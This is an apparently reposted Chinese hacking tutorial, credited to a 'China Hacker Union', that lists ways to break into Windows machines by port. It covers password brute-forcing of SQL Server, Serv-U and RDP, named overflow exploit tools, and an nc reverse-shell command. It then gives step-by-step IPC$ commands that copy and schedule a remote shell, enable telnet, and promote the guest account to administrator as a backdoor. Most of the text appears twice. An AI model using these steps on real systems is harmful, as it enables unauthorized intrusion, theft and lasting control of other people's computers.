1. 1433端口入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃瞄空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL進行注入。(啊D的注入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,進行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
經典IPC$入侵
11. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連
接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號裡的是用戶名,輸入administrators,命令即可成功完成。
12. C:\>copy srv.exe $">\\127.0.0.1\admin$
先複製srv.exe上去,在流光的Tools目錄下就有(這裡的$是指admin用戶的
c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。
13. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
14. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這裡設置的時間要比主機時間快,不然你怎麼啟動啊.
15. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
16. C:\>telnet 127.0.0.1 99
這裡會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打
算建立一個Telnet服務!這就要用到ntlm了
17.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
18. C:\WINNT\system32>ntlm
輸入ntlm啟動(這裡的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
19. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)為了以防萬一,我們再把guest激活加到管理組
20. C:\>net user guest /active:yes
將對方的Guest用戶激活
21. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
22. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次可以用guest再次訪問這台計算機)
資料來源 中國黑客聯盟
By dqr731
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃瞄空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL進行注入。(啊D的注入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,進行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
經典IPC$入侵
11. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連
接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號裡的是用戶名,輸入administrators,命令即可成功完成。
12. C:\>copy srv.exe $">\\127.0.0.1\admin$
先複製srv.exe上去,在流光的Tools目錄下就有(這裡的$是指admin用戶的
c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。
13. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
14. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這裡設置的時間要比主機時間快,不然你怎麼啟動啊.
15. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
16. C:\>telnet 127.0.0.1 99
這裡會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打
算建立一個Telnet服務!這就要用到ntlm了
17.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
18. C:\WINNT\system32>ntlm
輸入ntlm啟動(這裡的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
19. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)為了以防萬一,我們再把guest激活加到管理組
20. C:\>net user guest /active:yes
將對方的Guest用戶激活
21. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
22. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次可以用guest再次訪問這台計算機)
資料來源 中國黑客聯盟
By dqr731
全站熱搜
留言列表
